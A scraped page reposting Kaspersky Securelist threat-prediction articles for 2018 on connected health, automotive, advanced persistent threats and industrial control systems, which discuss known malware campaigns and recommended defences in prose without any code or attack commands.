  1. Attacks targeting medical equipment with the aim of extortion, malicious disruption or worse, will rise. The volume of specialist medical equipment connected to computer networks is increasing.  Many such networks are private, but one external Internet connection can be enough for attackers to breach and spread their malware through the ‘closed’ network. Targeting equipment can disrupt care and prove fatal – so the likelihood of the medical facility paying up is very high.
  2. There will also be a rise in the number of targeted attacks focused on stealing data.  The amount of medical information and patient data held and processed by connected healthcare systems grows daily. Such data is immensely valuable on the black market and can also be used for blackmail and extortion. It’s not just other criminals who could be interested: the victim’s employer or insurance company might want to know as it could impact premiums or even job security.
  3. There will be more incidents related to ransomware attacks against healthcare facilities. These will involve data encryption as well as device blocking: connected medical equipment is often expensive and sometimes life-critical, which makes them a prime target for attack and extortion.
  4. The concept of a clearly-defined corporate perimeter will continue to ‘erode’ in medical institutions, as ever more workstations, servers, mobile devices and equipment go online. This will give criminals more opportunities to gain access to medical information and networks. Keeping defenses and endpoints secure will be a growing challenge for healthcare security teams as every new device will open up a new entry point into the corporate infrastructure.
  5. Sensitive and confidential data transmitted between connected ‘wearables’, including implants, and healthcare professionals will be a growing target for attack as the use of such devices in medical diagnosis, treatment and preventative care continues to increase.  Pacemakers and insulin pumps are prime examples.
  6. National and regional healthcare information systems that share unencrypted or otherwise insecure patient data between local practitioners, hospitals, clinics and other facilities will be a growing target for attackers looking to intercept data beyond the protection of corporate firewalls. The same applies to data shared between medical facilities and health insurance companies.
  7. The growing use by consumers of connected health and fitness gadgets will offer attackers access to a vast volume of personal data that is generally minimally protected. The popularity of health-conscious, connected lifestyles means that fitness bracelets, trackers, smart watches, etc. will carry and transmit ever larger quantities of personal data with only basic security – and cybercriminals won’t hesitate to exploit this.
  8. Disruptive attacks – whether in the form of denial of service attacks or through ‘ransomware’ that simply destroys data (such as WannaCry) – are a growing threat to increasingly digital health care facilities. The ever increasing number of work stations, electronic records management and digital business processes that underpin any modern organization broadens the attack surface for cybercriminals.  In healthcare, they take on an extra urgency, as any disruption can in real terms become a matter of life or death.

Last, but not least,  emerging technologies such as connected artificial limbs, implants for smart physiological enhancements, embedded augmented reality etc. designed both to address disabilities and create better, stronger, fitter human beings  – will offer innovative attackers new opportunities for malicious action and harm unless they have security integrated from the very first moment of design.

http://ift.tt/2yEMuYU Source: https://securelist.com



Threat Predictions for Automotive in 2018

no-image

The landscape in 2017

Modern cars are no longer just electro-mechanical vehicles. With each generation, they become more connected and incorporate more intelligent technologies to make them smarter, more efficient, comfortable and safe. The connected-car market is growing at a five-year compound annual growth rate of 45% — 10 times faster than the car market overall.

In some regions (e.g. the EU or Russia) two-way connected systems (eCall, ERA-GLONASS) are extensively implemented for safety and monitoring purposes; and all major auto manufacturers now offer services that allow users to interact remotely with their car via a web interface or a mobile app.

Remote fault diagnostics, telematics and connected infotainment significantly enhance driver safety and enjoyment, but they also present new challenges for the automotive sector as they turn vehicles into prime targets for cyberattack. The growing risk of a vehicle’s systems being infiltrated or having its safety, privacy and financial elements violated, requires manufacturers to understand and apply IT security. Recent years have seen a number (here, here, and here) of examples highlighting the vulnerability of connected cars.

What can we expect in 2018?

Gartner estimates that there will be a quarter of a billion connected cars on the roads by 2020. Others suggest that by then around 98% of cars will be connected to the Internet.  The threats we face now, and those we expect to face over the coming year should not be seen in isolation – they are part of this continuum – the more vehicles are connected, in more ways, the greater the surface and opportunities for attack.

The threats facing the automotive sector over the coming 12 months include the following:

  1. Vulnerabilities introduced through lack of manufacturer attention or expertise, combined with competitive pressures. The range of connected mobility services being launched will continue to rise, as will the number of suppliers developing and delivering them. This ever-growing supply (and the likelihood of products/suppliers being of variable quality), coupled with a fiercely competitive marketplace could lead to security short cuts or gaps that provide an easy way in for attackers.
  2. Vulnerabilities introduced through growing product and service complexity. Manufacturers serving the automotive sector are increasingly focused on delivering multiple interconnected services to customers. Every link is a potential point of weakness that attackers will be quick to seize on. An attacker only needs to find one insecure opening, whether that is peripheral such as a phone Bluetooth or a music download system, for example, and from there they may be able to take control of safety-critical electrical components like the brakes or engine, and wreak havoc.
  3. No software code is 100% bug free – and where there are bugs there can be exploits. Vehicles already carry more than 100 million lines of code. This in in itself represents a massive attack surface for cybercriminals. And as more connected elements are installed into vehicles, the volume of code will soar, increasing the risk of bugs. Some automotive manufacturers, including Tesla have introduced specific bug bounty programs to address this.
  4. Further, with software being written by different developers, installed by different suppliers, and often reporting back to different management platforms, no one player will have visibility of, let alone control over, all of a vehicle’s source code. This could make it easier for attackers to bypass detection.
  5. Apps mean happiness for cybercriminals. There are a growing number of smartphone apps, many introduced by car manufacturers, which owners can download to remotely unlock their cars, check the engine status or find its location. Researchers have already demonstrated proof of concepts of how such apps can be compromised. It will not be long before Trojanized apps appear that inject malware direct into the heart of an unsuspecting victim’s vehicle.
  6. With connected components increasingly introduced by companies more familiar with hardware than software, there is a growing risk that the need for constant updates could be overlooked. This could make it harder, if not impossible for known issues to be patched remotely. Vehicle recalls take time and cost money and in the meantime many drivers will be left exposed.
  7. Connected vehicles will generate and process ever more data – about the vehicle, but also about journeys and even personal data on the occupants – this will be of growing appeal to attackers looking to sell the data on the black market or to use it for extortion and blackmail. Car manufacturers are already under pressure from marketing companies eager to get legitimate access to passenger and journey data for real time location-based advertising.
  8. Fortunately, growing awareness and understanding of security threats will result in the first cyber secure devices for remote diagnostic and telematics data appearing on the marke
  9. Further, lawmakers will come up with requirements and recommendations for making cybersecurity a mandatory part of all connected vehicles.
  10. Last but not least, alongside existing safety certification there will be new organizations set up that are responsible for cybersecurity certification. They will use clearly defined standards to assess connected vehicles in terms of their resistance to cyberattacks.

Recommended action

Addressing these risks involves integrating security as standard, by design, focused on different parts of the connected car ecosystem. Defensive software solutions could be installed locally on individual electrical components— for instance, the brakes — to reinforce them against attacks. Next, software can protect the vehicle’s internal network as a whole by examining all network communications, flagging any changes in standard in-vehicle network behaviour and stopping attacks from advancing in the network. Overarching this, a solution needs to protect all components that are connected externally, to the Internet. Cloud security services can detect and correct threats before they reach the vehicle. They also can send the vehicle over-the-air updates and intelligence in real time.  All of this should be supported with rigorous and consistent industry standards.

http://ift.tt/2ALz7aE Source: https://securelist.com



Kaspersky Security Bulletin: Threat Predictions for 2018

Introduction

As hard as it is to believe, it’s once again time for our APT Predictions. Looking back at a year like 2017 brings the internal conflict of being a security researcher into full view: on the one hand, each new event is an exciting new research avenue for us, as what were once theoretical problems find palpable expression in reality. This allows us to understand the actual attack surface and attacker tactics and to further hone our hunting and detection to address new attacks. On the other hand, as people with a heightened concern for the security posture of users at large, each event is a bigger catastrophe. Rather than consider each new breach as yet another example of the same, we see the compounding cumulative insecurity facing users, e-commerce, financial, and governmental institutions alike.

As we stated last year, rather than thinly-veiled vendor pitching, our predictions are an attempt to bring to bear our research throughout the year in the form of trends likely to peak in the coming year.

Our record – did we get it right?

As a snapshot scorecard of our performance last year, these are some of our 2017 predictions and some examples where relevant:

Espionage and APTs:

Financial Attacks:

Ransomware:

Industrial threats:

  • The ICS Armageddon didn’t come yet (and we are happy to be wrong on that), however, we’ve seen ICS come under attack from Industoyer – http://ift.tt/2ra3Xoj

IoT:

Information Warfare:

What can we expect in 2018?

  1. More supply chain attacks. Kaspersky Lab’s Global Research and Analysis Team tracks over 100 APT (advanced persistent threat) groups and operations. Some of these are incredibly sophisticated and possess wide arsenals that include zero-day exploits, fileless attack tools, and combine traditional hacking attacks with handovers to more sophisticated teams that handle the exfiltration part. We have often seen cases in which advanced threat actors have attempted to breach a certain target over a long period of time and kept failing at it. This was either due to the fact that the target was using strong internet security suites, had educated their employees not to fall victim to social engineering, or consciously followed the Australian DSD TOP35 mitigation strategies for APT attacks. In general, an actor that is considered both advanced and persistent won’t give up that easily, they’ll continue poking the defenses until they find a way in.

    When everything else fails, they are likely to take a step back and re-evaluate the situation. During such a re-evaluation, threat actors can decide a supply chain attack can be more effective than trying to break into their target directly. Even a target whose networks employ the world’s best defenses is likely using software from a third-party. The third party might be an easier target and can be leveraged to attack the better protected original target enterprise.

    During 2017, we have seen several such cases, including but not limited to:

    1. Shadowpad
    2. CCleaner
    3. ExPetr / NotPetya

    These attacks can be extremely difficult to identify or mitigate. For instance, in the case of Shadowpad, the attackers succeeded in Trojanizing a number of packages from Netsarang that were widely used around world, in banks, large enterprises, and other industry verticals. The difference between the clean and Trojanized packages can be dauntingly difficult to notice –in many cases it’s the command and control (C&C) traffic that gives them away.

    For CCleaner, it was estimated that over 2 million computers received the infected update, making it one of the biggest attacks of 2017. Analysis of the malicious CCleaner code allowed us to correlate it with a couple of other backdoors that are known to have been used in the past by APT groups from the ‘Axiom umbrella’, such as APT17 also known as Aurora. This proves the now extended lengths to which APT groups are willing to go in order to accomplish their objectives.

    Our assessment is that the amount of supply chain attacks at the moment is probably much higher than we realize but these have yet to be noticed or exposed. During 2018, we expect to see more supply chain attacks, both from the point of discovery and as well as actual attacks. Trojanizing specialized software used in specific regions and verticals will become a move akin to waterholing strategically chosen sites in order to reach specific swaths of victims and will thus prove irresistible to certain types of attackers.

  2. More high-end mobile malware. In August 2016, CitizenLab and Lookout published their analysis of the discovery of a sophisticated mobile espionage platform named Pegasus. Pegasus, a so-called ‘lawful interception’ software suite, is sold to governments and other entities by an Israeli company called NSO Group. When combined with zero-days capable of remotely bypassing a modern mobile operating systems’ security defenses, such as iOS, this is a highly potent system against which there is little defense.  In April 2017, Google published its analysis of the Android version of the Pegasus spyware which it called Chrysaor. In addition to ‘lawful surveillance’ spyware such as Pegasus and Chrysaor, many other APT groups have developed their own mobile malware implants.

    Due to the fact that iOS is an operating system locked down from introspection, there is very little that a user can do to check if their phone is infected. Somehow, despite the greater state of vulnerability of Android, the situation is better on Android where products such as Kaspersky AntiVirus for Android are available to ascertain the integrity of a device.

    Our assessment is that the total number of mobile malware existing in the wild is likely higher than currently reported, due to shortcomings in telemetry that makes these more difficult to spot and eradicate. We estimate that in 2018 more high-end APT malware for mobile will be discovered, as a result of both an increase in the attacks and improvement in security technologies designed to catch them.

  3. More BeEF-like compromises with web profiling. Due to a combination of increased interest and better security and mitigation technologies being deployed by default in operating systems, the prices of zero-day exploits have skyrocketed through 2016 and 2017. For instance, the latest Zerodium payout chart lists up to $1,500,000 for a complete iPhone (iOS) Remote jailbreak with persistence attack, which is another way of saying ‘a remote infection without any interaction from the user’.

    The incredible prices that some government customers have most certainly chosen to pay for these exploits mean there is increasing attention paid towards protecting these exploits from accidental disclosure. This translates into the implementation of a more solid reconnaissance phase before delivering the actual attack components. The reconnaissance phase can, for instance emphasize the identification of the exact versions of the browser used by the target, their operating system, plugins and other third-party software. Armed with this knowledge, the threat actor can fine tune their exploit delivery to a less sensitive ‘1-day’ or ‘N-day’ exploit, instead of using the crown jewels.

    These profiling techniques have been fairly consistent with APT groups like Turla and Sofacy, as well as Newsbeef (a.k.a. Newscaster, Ajax hacking team, or  ‘Charming Kitten’), but also other APT groups known for their custom profiling frameworks, such as the prolific Scanbox. Taking the prevalence of these frameworks into account in combination with a surging need to protect expensive tools, we estimate the usage of profiling toolkits such as ‘BeEF‘ will increase in 2018 with more groups adopting either public frameworks or developing their own.

  4. Sophisticated UEFI and BIOS attacks. The Unified Extensible Firmware Interface (UEFI) is a software interface which serves as the intermediary between the firmware and the operating system on modern PCs. Established in 2005 by an alliance of leading software and hardware developers, Intel most notable amongst them, it’s now quickly superseding the legacy BIOS standard. This was achieved thanks to a number of advanced features that BIOS lacks: for example, the ability to install and run executables, networking and Internet capabilities, cryptography, CPU-independent architecture and drivers, etc. The very advanced capabilities that make UEFI such an attractive platform also open the way to new vulnerabilities that didn’t exist in the age of the more rigid BIOS. For example, the ability to run custom executable modules makes it possible to create malware that would be launched by UEFI directly before any anti-malware solution – or, indeed, the OS itself – had a chance to start.

    The fact that commercial-grade UEFI malware exists has been known since 2015, when the Hacking team UEFI modules were discovered. With that in mind, it is perhaps surprising that no significant UEFI malware has been found, a fact that we attribute to the difficulty in detecting these in a reliable way. We estimate that in 2018 we will see the discovery of more UEFI-based malware.

  5. Destructive attacks continue. Beginning in November 2016, Kaspersky Lab observed a new wave of wiper attacks directed at multiple targets in the Middle East. The malware used in the new attacks was a variant of the infamous Shamoon worm that targeted Saudi Aramco and Rasgas back in 2012. Dormant for four years, one of the most mysterious wipers in history has returned. Also known as Disttrack, Shamoon is a highly destructive malware family that effectively wipes the victim machine. A group known as the ‘Cutting Sword of Justice’ took credit for the Saudi Aramco attack by posting a Pastebin message on the day of the attack (back in 2012), and justified the attack as a measure against the Saudi monarchy.

    The Shamoon 2.0 attacks seen in November 2016 targeted organizations in various critical and economic sectors in Saudi Arabia. Just like the previous variant, the Shamoon 2.0 wiper aims for the mass destruction of systems inside compromised organizations. While investigating the Shamoon 2.0 attacks, Kaspersky Lab also discovered a previously unknown wiper malware that appears to be targeting organizations in Saudi Arabia. We’ve called this new wiper StoneDrill and have been able to link it with a high degree of confidence to the Newsbeef APT group.

    In addition to Shamoon and Stonedrill, 2017 has been a tough year in terms of destructive attacks. The ExPetr/NotPetya attack, which was initially considered to be ransomware, turned out to be a cleverly camouflaged wiper as well. ExPetr was followed by other waves of ‘ransomware’ attacks, in which there is little chance for the victims to recover their data; all cleverly masked ‘wipers as ransomware’. One of the lesser known facts about ‘wipers as ransomware’ is perhaps that a wave of such attacks was observed in 2016 from the CloudAtlas APT, which leveraged what appeared to be ‘wipers as ransomware’ against financial institutions in Russia.

    In 2018, we estimate that destructive attacks will continue to rise, leveraging its status as the most visible type of cyberwarfare.

  6. More subversion of cryptography. In March 2017, IoT encryption scheme proposals developed by the NSA came into question with Simon and Speck variant ISO approvals being both withdrawn and delayed a second time.

    In August 2016, Juniper Networks announced the discovery of two mysterious backdoors in their NetScreen firewalls. Perhaps the most interesting of the two was an extremely subtle change of the constants used for the Dual_EC random number generator, which would allow a knowledgeable attacker to decrypt VPN traffic from NetScreen devices. The original Dual_EC algorithm was designed by the NSA and pushed through NIST. Back in 2013, a Reuters report suggested that NSA paid RSA $10 million to put the vulnerable algorithm in their products as a means of subverting encryption. Even if the theoretical possibility of a backdoor was identified as early as 2007, several companies (including Juniper) continued to use it with a different set of constants, which would make it theoretically secure. It appears that this different set of constants made some APT actor unhappy enough to merit hacking into Juniper and changing the constants to a set that they could control and leverage to decrypt VPN connections.

    These attempts haven’t gone unnoticed. In September 2017, an international group of cryptography experts have forced the NSA to back down on two new encryption algorithms, which the organization was hoping to standardize.

    In October 2017, news broke about a flaw in a cryptographic library used by Infineon in their hardware chips for generation of RSA primes. While the flaw appears to have been unintentional, it does leave the question open in regards to how secure are the underlying encryption technologies used in our everyday life, from smart cards, wireless networks or encrypted web traffic. In 2018, we predict that more severe cryptographic vulnerabilities will be found and (hopefully) patched, be they in the standards themselves or the specific implementations.

  7. Identity in e-commerce comes into crisis. The past few years have been punctuated by increasingly catastrophic large-scale breaches of personally identifiable information (PII). Latest among these is the Equifax breach reportedly affecting 145.5 million Americans.  While many have grown desensitized to the weight of these breaches, it’s important to understand that the release of PII at scale endangers a fundamental pillar of e-commerce and the bureaucratic convenience of adopting the Internet for important paperwork. Sure, fraud and identity theft have been problems for a long time, but what happens when the fundamental identifying information is so widely proliferated that it’s simply not reliable at all? Commerce and governmental institutions (particularly in the United States) will be faced with a choice between scaling back the modern comforts of adopting the Internet for operations or doubling down on the adoption of other multi-factor solutions. Perhaps thus far resilient alternatives like ApplePay will come into vogue as de facto means of insuring identity and transactions, but in the meantime we may see a slowdown in the critical role of the Internet for modernizing tedious bureaucratic processes and cutting operational costs.
  8. More router and modem hacks. Another known area of vulnerability that has gone vastly ignored is that of routers and modems. Be they home or enterprise, these pieces of hardware are everywhere, they’re critically important to daily operations, and tend to run proprietary pieces of software that go unpatched and unwatched. At the end of the day, these little computers are Internet-facing by design and thereby sitting at a critical juncture for an attacker intent on gaining persistent and stealthy access to a network. Moreover, as some very cool recent research has shown, in some cases attackers might even be able to impersonate different Internet users, making it possible to throw off the trail of an attacker entirely to a different connecting address. At a time of increased interest in misdirection and false flags, this is no small feat. Greater scrutiny of these devices will inevitably yield some interesting findings.
  9. A medium for social chaos. Beyond the leaks and political drama of the past year’s newfound love for information warfare, social media itself has taken a politicized role beyond our wildest dreams. Whether it’s at the hand of political pundits or confusing comedic jabs at Facebook’s CEO by South Park’s writers, eyes have turned against the different social media giants demanding some level of fact-checking and identification of fake users and bots attempting to exert disproportionate levels of social influence. Sadly, it’s becoming obvious that these networks (which base their success on quantified metrics like ‘daily active users’) have little incentive to truly purge their user base of bots. Even when these bots are serving an obvious agenda or can be tracked and traced by independent researchers. We expect that as the obvious abuse continues and large bot networks become accessible to wider swaths of politically unsavory characters, that the greater backlash will be directed at the use of social media itself, with disgusted users eagerly looking for alternatives to the household giants that revel in the benefits of the abuse for profits and clicks.
  10. APT predictions – conclusion

    In 2017 we pronounced the death of Indicators of Compromise. In 2018, we expect to see advanced threat actors playing to their new strengths, honing their new tools and the terrifying angles described above.  Each year’s themes and trends shouldn’t be taken in isolation – they build on each other to enrich an ever-growing landscape of threats facing users of all types, be it individuals, enterprise, or government. The only consistent reprieve from this onslaught is the sharing and knowledgeable application of high-fidelity threat intelligence.

    While these predictions cover trends for advanced targeted threats, individual industry sectors will face their own distinct challenges. In 2018, we wanted to shine the spotlight on some of those as well – and have prepared predictions for the connected healthcare, automotive, financial services, and industrial security sectors, as well as cryptocurrencies. You can find them all here!

    Threat Predictions for Automotive in 2018
    Threat Predictions for Connected Health in 2018
    Threat Predictions for Financial Services and Fraud in 2018
    Threat Predictions for Industrial Security in 2018
    Threat Predictions for Cryptocurrencies in 2018

http://ift.tt/2yEMwA0 Source: https://securelist.com



Threat Predictions for Industrial Security in 2018

The landscape in 2017

2017 was one of the most intense in terms of incidents affecting the information security of industrial systems. Security researchers discovered and reported hundreds of new vulnerabilities, warned of new threat vectors in ICS and technological processes, provided data on accidental infections of industrial systems and detected targeted attacks (for example, Shamoon 2.0/StoneDrill). And, for the first time since Stuxnet, discovered a malicious toolset some call a ‘cyber-weapon’ targeting physical systems: CrashOverride/Industroyer.

However, the most significant threat to industrial systems in 2017 was encryption ransomware attacks. According to a Kaspersky Lab ICS CERT report, in the first half of the year experts discovered encryption ransomware belonging to 33 different families. Numerous attacks were blocked, in 63 countries across the world. The WannaCry and ExPetr destructive ransomware attacks appear to have changed forever the attitude of industrial enterprises to the problem of protecting essential production systems.

What can we expect in 2018?

  1. A rise in general and accidental malware infections. With few exceptions, cybercriminal groups have not yet discovered simple and reliable schemes for monetizing attacks on industrial information systems. Accidental infections and incidents in industrial networks caused by ‘normal’ (general) malicious code aimed at a more traditional cybercriminal target such as the corporate networks, will continue in 2018. At the same time, we are likely to see such situations result in more severe consequences for industrial environments. The problem of regularly updating software in industrial systems in line with the corporate network remains unresolved, despite repeated warnings from the security community.
  2. Increased risk of targeted ransomware attacks. The WannaCry and ExPetr attacks taught both security experts and cybercriminals that operational technology (OT) systems are more vulnerable to attack than IT systems, and are often exposed to access through the Internet. Moreover, the damage caused by malware can exceed that in the corresponding corporate network, and ‘firefighting’ in the case of OT is much more difficult. Industrial companies have demonstrated how inefficient their organization and staff can be when it comes to cyberattacks on their OT infrastructure. All of these factors make industrial systems a desirable target for ransomware attacks.
  3. More incidents of industrial cyberespionage. The growing threat of organized ransomware attacks against industrial companies could trigger development of another, related area of cybercrime: the theft of industrial information systems data to be used afterwards for the preparation and implementation of targeted (including ransomware) attacks.
  4. New underground market activity focused on attack services and hacking tools. In recent years, we have seen growing demand on the black market for zero day exploits targeting ICS. This tells us that criminals are working on targeted attack campaigns. We expect to see this interest increase in 2018, stimulating the growth of the black markets and the appearance of new segments focused on ICS configuration data and ICS credentials stolen from industrial companies and, possibly, botnets with ‘industrial’ nodes offerings. Design and implementation of advanced cyberattacks targeting physical objects and systems requires an expert knowledge of ICS and relevant industries. Demand is expected to drive growth in areas such as ‘malware-as-a-service’, ‘attack-vector-design-as-a-service’, ‘attack-campaign-as-a-service’ and more.
  5. New types of malware and malicious tools. We will probably see new malware being used to target industrial networks and assets, with features including stealth and the ability to remain inactive in the IT network to avoid detection, only activating in less secure OT infrastructure. Another possibility is the appearance of ransomware targeting lower-level ICS devices and physical assets (pumps, power switches, etc.).
  6. Criminals will take advantage of ICS threat analyses published by security vendors. Researchers have done a good job finding and making public various attack vectors on industrial assets and infrastructures and analyzing the malicious toolsets found. However, this could also provide criminals with new opportunities. For example, the CrashOverride/Industroyer toolset disclosure could inspire hacktivists to run denial-of-service attacks on power and energy utilities; or criminals may targeted ransomware and may even invent monetizing schemes for blackouts. The PLC (programmable logic controller) worm concept could inspire criminals to create real world malicious worms; while others could try to implement malware using one of standard languages for programming PLCs. Criminals also could recreate the concept of infecting the PLC itself. Both these types of malware could remain undetected by existing security solutions.
  7. Changes in national regulation. In 2018, a number of different cybersecurity regulations for industrial systems will need to be implemented. For example, those with critical infrastructures and industrial assets facilities will be compelled to do more security assessments. This will definitely increase protection and awareness. Thanks to that, we will probably see some new vulnerabilities found and threats disclosed.
  8. Growing availability of, and investment in industrial cyber insurance. Industrial cyber-risk insurance is becoming an integral part of risk management for industrial enterprises. Previously, the risk of a cybersecurity incident was excluded from insurance contracts – just like the risk of a terrorist attack. But the situation is changing, with new initiatives introduced by both cybersecurity and insurance companies. In 2018, this will increase the number of audits/assessments and incident responses undertaken, raising cybersecurity awareness among the industrial facility’s leaders and operators.

http://ift.tt/2yEMw2Y Source: https://securelist.com




top